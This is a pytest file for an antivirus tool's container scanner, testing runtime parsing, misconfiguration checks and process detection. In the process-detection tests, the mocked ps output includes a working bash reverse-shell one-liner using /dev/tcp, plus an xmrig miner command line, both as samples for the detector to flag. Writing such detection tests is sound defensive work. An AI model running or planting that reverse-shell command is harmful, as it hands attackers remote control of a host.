406 lines
14 KiB
Python
406 lines
14 KiB
Python
"""Tests for the container scanner module."""
|
|
|
|
from __future__ import annotations
|
|
|
|
import json
|
|
from unittest.mock import patch
|
|
|
|
import pytest
|
|
|
|
from ayn_antivirus.scanners.container_scanner import (
|
|
ContainerInfo,
|
|
ContainerScanResult,
|
|
ContainerScanner,
|
|
ContainerThreat,
|
|
)
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Data class tests
|
|
# ---------------------------------------------------------------------------
|
|
|
|
class TestContainerInfo:
|
|
def test_defaults(self):
|
|
ci = ContainerInfo(
|
|
container_id="abc", name="web", image="nginx",
|
|
status="running", runtime="docker", created="2026-01-01",
|
|
)
|
|
assert ci.ports == []
|
|
assert ci.mounts == []
|
|
assert ci.pid == 0
|
|
assert ci.ip_address == ""
|
|
assert ci.labels == {}
|
|
|
|
def test_to_dict(self):
|
|
ci = ContainerInfo(
|
|
container_id="abc", name="web", image="nginx:1.25",
|
|
status="running", runtime="docker", created="2026-01-01",
|
|
ports=["80:80"], mounts=["/data"], pid=42,
|
|
ip_address="10.0.0.2", labels={"env": "prod"},
|
|
)
|
|
d = ci.to_dict()
|
|
assert d["container_id"] == "abc"
|
|
assert d["ports"] == ["80:80"]
|
|
assert d["labels"] == {"env": "prod"}
|
|
|
|
|
|
class TestContainerThreat:
|
|
def test_to_dict(self):
|
|
ct = ContainerThreat(
|
|
container_id="abc", container_name="web", runtime="docker",
|
|
threat_name="Miner.X", threat_type="miner",
|
|
severity="CRITICAL", details="found xmrig",
|
|
)
|
|
d = ct.to_dict()
|
|
assert d["threat_name"] == "Miner.X"
|
|
assert d["severity"] == "CRITICAL"
|
|
assert len(d["timestamp"]) == 19
|
|
|
|
def test_optional_fields(self):
|
|
ct = ContainerThreat(
|
|
container_id="x", container_name="y", runtime="podman",
|
|
threat_name="T", threat_type="malware", severity="HIGH",
|
|
details="d", file_path="/tmp/bad", process_name="evil",
|
|
)
|
|
d = ct.to_dict()
|
|
assert d["file_path"] == "/tmp/bad"
|
|
assert d["process_name"] == "evil"
|
|
|
|
|
|
class TestContainerScanResult:
|
|
def test_empty_is_clean(self):
|
|
r = ContainerScanResult(scan_id="t", start_time="2026-01-01 00:00:00")
|
|
assert r.is_clean is True
|
|
assert r.duration_seconds == 0.0
|
|
|
|
def test_with_threats(self):
|
|
ct = ContainerThreat(
|
|
container_id="a", container_name="b", runtime="docker",
|
|
threat_name="T", threat_type="miner", severity="HIGH",
|
|
details="d",
|
|
)
|
|
r = ContainerScanResult(
|
|
scan_id="t",
|
|
start_time="2026-01-01 00:00:00",
|
|
end_time="2026-01-01 00:00:10",
|
|
threats=[ct],
|
|
)
|
|
assert r.is_clean is False
|
|
assert r.duration_seconds == 10.0
|
|
|
|
def test_to_dict(self):
|
|
r = ContainerScanResult(
|
|
scan_id="t",
|
|
start_time="2026-01-01 00:00:00",
|
|
end_time="2026-01-01 00:00:03",
|
|
containers_found=2,
|
|
containers_scanned=1,
|
|
errors=["oops"],
|
|
)
|
|
d = r.to_dict()
|
|
assert d["threats_found"] == 0
|
|
assert d["duration_seconds"] == 3.0
|
|
assert d["errors"] == ["oops"]
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Scanner tests
|
|
# ---------------------------------------------------------------------------
|
|
|
|
class TestContainerScanner:
|
|
def test_properties(self):
|
|
s = ContainerScanner()
|
|
assert s.name == "container_scanner"
|
|
assert "Docker" in s.description
|
|
assert isinstance(s.available_runtimes, list)
|
|
|
|
def test_no_runtimes_graceful(self):
|
|
"""With no runtimes installed scan returns an error, not an exception."""
|
|
s = ContainerScanner()
|
|
s._available_runtimes = []
|
|
s._docker_cmd = None
|
|
s._podman_cmd = None
|
|
s._lxc_cmd = None
|
|
r = s.scan("all")
|
|
assert isinstance(r, ContainerScanResult)
|
|
assert r.containers_found == 0
|
|
assert len(r.errors) == 1
|
|
assert "No container runtimes" in r.errors[0]
|
|
|
|
def test_scan_returns_result(self):
|
|
s = ContainerScanner()
|
|
r = s.scan("all")
|
|
assert isinstance(r, ContainerScanResult)
|
|
assert r.scan_id
|
|
assert r.start_time
|
|
assert r.end_time
|
|
|
|
def test_scan_container_delegates(self):
|
|
s = ContainerScanner()
|
|
s._available_runtimes = []
|
|
r = s.scan_container("some-id")
|
|
assert isinstance(r, ContainerScanResult)
|
|
|
|
def test_run_cmd_timeout(self):
|
|
_, stderr, rc = ContainerScanner._run_cmd(["sleep", "10"], timeout=1)
|
|
assert rc == -1
|
|
assert "timed out" in stderr.lower()
|
|
|
|
def test_run_cmd_not_found(self):
|
|
_, stderr, rc = ContainerScanner._run_cmd(
|
|
["this_command_does_not_exist_xyz"],
|
|
)
|
|
assert rc == -1
|
|
assert "not found" in stderr.lower() or "No such file" in stderr
|
|
|
|
def test_find_command(self):
|
|
# python3 should exist everywhere
|
|
assert ContainerScanner._find_command("python3") is not None
|
|
assert ContainerScanner._find_command("no_such_binary_xyz") is None
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Mock-based integration tests
|
|
# ---------------------------------------------------------------------------
|
|
|
|
class TestDockerParsing:
|
|
"""Test Docker output parsing with mocked subprocess calls."""
|
|
|
|
def _make_scanner(self):
|
|
s = ContainerScanner()
|
|
s._docker_cmd = "/usr/bin/docker"
|
|
s._available_runtimes = ["docker"]
|
|
return s
|
|
|
|
def test_list_docker_parses_output(self):
|
|
ps_output = (
|
|
"abc123456789\tweb\tnginx:1.25\tUp 2 hours\t"
|
|
"2026-01-01 00:00:00\t0.0.0.0:80->80/tcp"
|
|
)
|
|
inspect_output = json.dumps([{
|
|
"State": {"Pid": 42},
|
|
"NetworkSettings": {"Networks": {"bridge": {"IPAddress": "172.17.0.2"}}},
|
|
"Mounts": [{"Source": "/data"}],
|
|
"Config": {"Labels": {"app": "web"}},
|
|
}])
|
|
s = self._make_scanner()
|
|
with patch.object(s, "_run_cmd") as mock_run:
|
|
mock_run.side_effect = [
|
|
(ps_output, "", 0), # docker ps
|
|
(inspect_output, "", 0), # docker inspect
|
|
]
|
|
containers = s._list_docker()
|
|
|
|
assert len(containers) == 1
|
|
c = containers[0]
|
|
assert c.name == "web"
|
|
assert c.image == "nginx:1.25"
|
|
assert c.status == "running"
|
|
assert c.runtime == "docker"
|
|
assert c.pid == 42
|
|
assert c.ip_address == "172.17.0.2"
|
|
assert "/data" in c.mounts
|
|
assert c.labels == {"app": "web"}
|
|
|
|
def test_list_docker_ps_failure(self):
|
|
s = self._make_scanner()
|
|
with patch.object(s, "_run_cmd", return_value=("", "error", 1)):
|
|
assert s._list_docker() == []
|
|
|
|
def test_inspect_docker_bad_json(self):
|
|
s = self._make_scanner()
|
|
with patch.object(s, "_run_cmd", return_value=("not json", "", 0)):
|
|
assert s._inspect_docker("abc") == {}
|
|
|
|
|
|
class TestPodmanParsing:
|
|
def test_list_podman_parses_json(self):
|
|
s = ContainerScanner()
|
|
s._podman_cmd = "/usr/bin/podman"
|
|
s._available_runtimes = ["podman"]
|
|
podman_output = json.dumps([{
|
|
"Id": "def456789012abcdef",
|
|
"Names": ["db"],
|
|
"Image": "postgres:16",
|
|
"State": "running",
|
|
"Created": "2026-01-01",
|
|
"Ports": [{"hostPort": 5432, "containerPort": 5432}],
|
|
"Pid": 99,
|
|
"Labels": {},
|
|
}])
|
|
with patch.object(s, "_run_cmd", return_value=(podman_output, "", 0)):
|
|
containers = s._list_podman()
|
|
assert len(containers) == 1
|
|
assert containers[0].name == "db"
|
|
assert containers[0].runtime == "podman"
|
|
assert containers[0].pid == 99
|
|
|
|
|
|
class TestLXCParsing:
|
|
def test_list_lxc_parses_output(self):
|
|
s = ContainerScanner()
|
|
s._lxc_cmd = "/usr/bin/lxc-ls"
|
|
s._available_runtimes = ["lxc"]
|
|
lxc_output = "NAME STATE IPV4 PID\ntest1 RUNNING 10.0.3.5 1234"
|
|
with patch.object(s, "_run_cmd", return_value=(lxc_output, "", 0)):
|
|
containers = s._list_lxc()
|
|
assert len(containers) == 1
|
|
assert containers[0].name == "test1"
|
|
assert containers[0].status == "running"
|
|
assert containers[0].ip_address == "10.0.3.5"
|
|
assert containers[0].pid == 1234
|
|
|
|
|
|
class TestMisconfigDetection:
|
|
"""Test misconfiguration detection with mocked inspect output."""
|
|
|
|
def _scan_misconfig(self, inspect_data):
|
|
s = ContainerScanner()
|
|
s._docker_cmd = "/usr/bin/docker"
|
|
ci = ContainerInfo(
|
|
container_id="abc", name="test", image="img",
|
|
status="running", runtime="docker", created="",
|
|
)
|
|
with patch.object(s, "_run_cmd", return_value=(json.dumps([inspect_data]), "", 0)):
|
|
return s._check_misconfigurations(ci)
|
|
|
|
def test_privileged_mode(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {"Privileged": True},
|
|
"Config": {"User": "app"},
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "PrivilegedMode.Container" in names
|
|
|
|
def test_root_user(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {},
|
|
"Config": {"User": ""},
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "RunAsRoot.Container" in names
|
|
|
|
def test_host_network(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {"NetworkMode": "host"},
|
|
"Config": {"User": "app"},
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "HostNetwork.Container" in names
|
|
|
|
def test_host_pid(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {"PidMode": "host"},
|
|
"Config": {"User": "app"},
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "HostPID.Container" in names
|
|
|
|
def test_dangerous_caps(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {"CapAdd": ["SYS_ADMIN", "NET_RAW"]},
|
|
"Config": {"User": "app"},
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "DangerousCap.Container.SYS_ADMIN" in names
|
|
assert "DangerousCap.Container.NET_RAW" in names
|
|
|
|
def test_sensitive_mount(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {},
|
|
"Config": {"User": "app"},
|
|
"Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "SensitiveMount.Container" in names
|
|
|
|
def test_no_resource_limits(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {"Memory": 0, "CpuQuota": 0},
|
|
"Config": {"User": "app"},
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "NoResourceLimits.Container" in names
|
|
|
|
def test_security_disabled(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {"SecurityOpt": ["seccomp=unconfined"]},
|
|
"Config": {"User": "app"},
|
|
})
|
|
names = [t.threat_name for t in threats]
|
|
assert "SecurityDisabled.Container" in names
|
|
|
|
def test_clean_config(self):
|
|
threats = self._scan_misconfig({
|
|
"HostConfig": {"Memory": 512000000, "CpuQuota": 50000},
|
|
"Config": {"User": "app"},
|
|
})
|
|
# Should have no misconfig threats
|
|
assert len(threats) == 0
|
|
|
|
|
|
class TestImageCheck:
|
|
def test_latest_tag(self):
|
|
ci = ContainerInfo(
|
|
container_id="a", name="b", image="nginx:latest",
|
|
status="running", runtime="docker", created="",
|
|
)
|
|
threats = ContainerScanner._check_image(ci)
|
|
assert any("LatestTag" in t.threat_name for t in threats)
|
|
|
|
def test_no_tag(self):
|
|
ci = ContainerInfo(
|
|
container_id="a", name="b", image="nginx",
|
|
status="running", runtime="docker", created="",
|
|
)
|
|
threats = ContainerScanner._check_image(ci)
|
|
assert any("LatestTag" in t.threat_name for t in threats)
|
|
|
|
def test_pinned_tag(self):
|
|
ci = ContainerInfo(
|
|
container_id="a", name="b", image="nginx:1.25.3",
|
|
status="running", runtime="docker", created="",
|
|
)
|
|
threats = ContainerScanner._check_image(ci)
|
|
assert len(threats) == 0
|
|
|
|
|
|
class TestProcessDetection:
|
|
def _make_scanner_and_container(self):
|
|
s = ContainerScanner()
|
|
s._docker_cmd = "/usr/bin/docker"
|
|
ci = ContainerInfo(
|
|
container_id="abc", name="test", image="img",
|
|
status="running", runtime="docker", created="",
|
|
)
|
|
return s, ci
|
|
|
|
def test_miner_detected(self):
|
|
s, ci = self._make_scanner_and_container()
|
|
ps_output = (
|
|
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
|
|
"root 1 95.0 8.0 123456 65432 ? Sl 00:00 1:23 /usr/bin/xmrig --pool pool.example.com"
|
|
)
|
|
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
|
|
threats = s._check_processes(ci)
|
|
names = [t.threat_name for t in threats]
|
|
assert any("CryptoMiner" in n for n in names)
|
|
|
|
def test_reverse_shell_detected(self):
|
|
s, ci = self._make_scanner_and_container()
|
|
ps_output = (
|
|
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
|
|
"root 1 0.1 0.0 1234 432 ? S 00:00 0:00 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
|
|
)
|
|
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
|
|
threats = s._check_processes(ci)
|
|
names = [t.threat_name for t in threats]
|
|
assert any("ReverseShell" in n for n in names)
|
|
|
|
def test_stopped_container_skipped(self):
|
|
s, ci = self._make_scanner_and_container()
|
|
ci.status = "stopped"
|
|
# _get_exec_prefix returns None for stopped containers
|
|
threats = s._check_processes(ci)
|
|
assert threats == []
|